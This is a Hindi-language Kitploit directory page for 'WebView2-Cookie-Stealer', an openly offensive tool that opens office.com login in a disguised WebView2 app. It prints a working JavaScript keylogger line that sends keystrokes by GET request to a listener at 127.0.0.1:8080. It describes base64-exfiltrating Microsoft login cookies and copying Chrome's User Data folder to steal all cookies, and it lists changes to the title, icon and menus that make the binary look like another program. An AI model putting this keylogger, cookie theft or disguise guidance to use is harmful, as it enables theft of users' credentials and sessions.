Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WebView2-Cookie-Stealer — WebView2 पृष्ठों में JavaScript कीलॉगर इंजेक्ट करता है ताकि कीस्ट्रोक्स कैप्चर कर सके और Microsoft प्रमाणीकरण सत्रों से कुकीज़ को HTTP GET अनुरोधों के माध्यम से बाहर निकाल सके। | Kitploit
उपकरण/GitHubGitHub/mrd0x/webview2-cookie-stealer
पासवर्ड हमलेवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनाफिशिंग
GitHubmrd0x/webview2-cookie-stealer

WebView2-Cookie-Stealer

WebView2 पृष्ठों में JavaScript कीलॉगर इंजेक्ट करता है ताकि कीस्ट्रोक्स कैप्चर कर सके और Microsoft प्रमाणीकरण सत्रों से कुकीज़ को HTTP GET अनुरोधों के माध्यम से बाहर निकाल सके।

रिपॉजिटरी देखें
266584 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ब्लॉग पोस्ट

कृपया अधिक जानकारी के लिए यह ब्लॉग पोस्ट पढ़ें।

स्रोत कोड

यह कोड Microsoft के WebView2 कोड का एक संशोधित संस्करण है। वर्तमान कोड को साफ किया जा सकता है और बेहतर बनाया जा सकता है।

डेमो

लॉन्च उदाहरण

उपयोग उदाहरण

उपयोग

Windows 10 और 11 पर परीक्षण किया गया।

जब बाइनरी निष्पादित की जाती है तो https://office.com/login लोड होता है। प्रत्येक पृष्ठ में एक JavaScript कीलॉगर इंजेक्ट किया जाता है और कीस्ट्रोक्स http://127.0.0.1:8080 पर भेजे जाते हैं। इसके अलावा, उपयोगकर्ता के सफलतापूर्वक प्रमाणित होने पर login.microsoftonline.com के कुकीज़ base64-एन्कोडेड होते हैं और HTTP GET अनुरोध के माध्यम से http://127.0.0.1:8080 पर भेजे जाते हैं।

जावास्क्रिप्ट संशोधित करना

यदि आप जावास्क्रिप्ट को संशोधित करना चाहते हैं तो बदलने के लिए आवश्यक कोड नीचे AppWindow.cpp में पंक्ति 1096 पर दिखाया गया है।

root@kitploit:~
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Chrome कुकीज़ चुराना

WebView2 आपको एक नया बनाने के बजाय मौजूदा उपयोगकर्ता डेटा फ़ोल्डर (UDF) के साथ लॉन्च करने की अनुमति देता है। UDF में सभी पासवर्ड, सत्र, बुकमार्क आदि शामिल हैं। Chrome का UDF C:\Users\<username>\AppData\Local\Google\Chrome\User Data पर स्थित है। हम केवल WebView2 को इस प्रोफ़ाइल का उपयोग करके इंस्टेंस शुरू करने और लॉन्च के बाद सभी कुकीज़ निकालकर हमलावर के सर्वर पर स्थानांतरित करने का निर्देश दे सकते हैं।

एकमात्र समस्या यह है कि WebView2 User Data के बजाय EBWebView नामक फ़ोल्डर की तलाश करता है (पता नहीं क्यों)। User Data फ़ोल्डर को कॉपी करें और इसका नाम बदलकर EBWebView रखें।

आवश्यक परिवर्तन

  • app.cpp में पंक्ति 41 पर:

    • std::wstring userDataFolder(L""); को std::wstring userDataFolder(L"C:\\Path\\To\\Temp"); में बदलें
    • निर्दिष्ट फ़ोल्डर में EBWebView फ़ोल्डर होना चाहिए जिससे WebView2 पढ़ेगा।
  • ScenarioCookieManagement.cpp में पंक्ति 40 पर:

    • GetCookiesHelper(L"https://login.microsoftonline.com"); को GetCookiesHelper(L""); में बदलें

जब GetCookiesHelper को बिना कोई वेबसाइट प्रदान किए आमंत्रित किया जाता है तो यह सभी कुकीज़ निकाल लेगा।

नोट: यह वर्तमान एप्लिकेशन के साथ काम नहीं करेगा यदि बड़ी मात्रा में कुकीज़ हैं क्योंकि एप्लिकेशन उन्हें GET अनुरोध का उपयोग करके भेजता है जिसकी लंबाई सीमा होती है।

महत्वपूर्ण फ़ंक्शन

यदि आप बाइनरी में संशोधन करना चाहते हैं तो नीचे महत्वपूर्ण फ़ंक्शन के बारे में जानकारी मिलेगी।

  • AppStartPage.cpp - GetUri() फ़ंक्शन में वह URL है जो बाइनरी निष्पादन पर लोड होता है।
  • ScenarioCookieManagement.cpp - SendCookies() फ़ंक्शन में आईपी पता और पोर्ट है जहाँ कुकीज़ भेजी जाती हैं।
  • AppWindow.cpp - CallCookieFunction() फ़ंक्शन तब तक प्रतीक्षा करता है जब तक URL https://www.office.com/?auth= से शुरू नहीं होता और ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com") को कॉल करता है।
  • WebView2APISample.rc - कॉस्मेटिक परिवर्तन
    • सभी POPUP मानों को "" पर सेट करके मेनू बार हटाएँ।
    • IDS_APP_TITLE और IDC_WEBVIEW2APISAMPLE बदलें। यह टाइटल बार में एप्लिकेशन का नाम है।
    • IDI_WEBVIEW2APISAMPLE, IDI_WEBVIEW2APISAMPLE_INPRIVATE और IDI_SMALL बदलें। ये एक फ़ाइल की ओर इशारा करते हैं जो इस एप्लिकेशन का आइकन है।
टूल डाउनलोड करें
.ico
  • Toolbar.cpp - शीर्ष मेनू हटाने के लिए itemHeight को 0 पर सेट किया जाना चाहिए। इस कोड में इसका पहले से ध्यान रखा गया है।
  • AppWindow.cpp - LoadImage() को टिप्पणी के रूप में हटा देना चाहिए। यह नीली स्प्लैश छवि को छिपाता है। इस कोड में इसका पहले से ध्यान रखा गया है।
  • App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); अंतिम पैरामीटर मान को true में बदलें। यह टूलबार को छिपाता है। इस कोड में इसका पहले से ध्यान रखा गया है।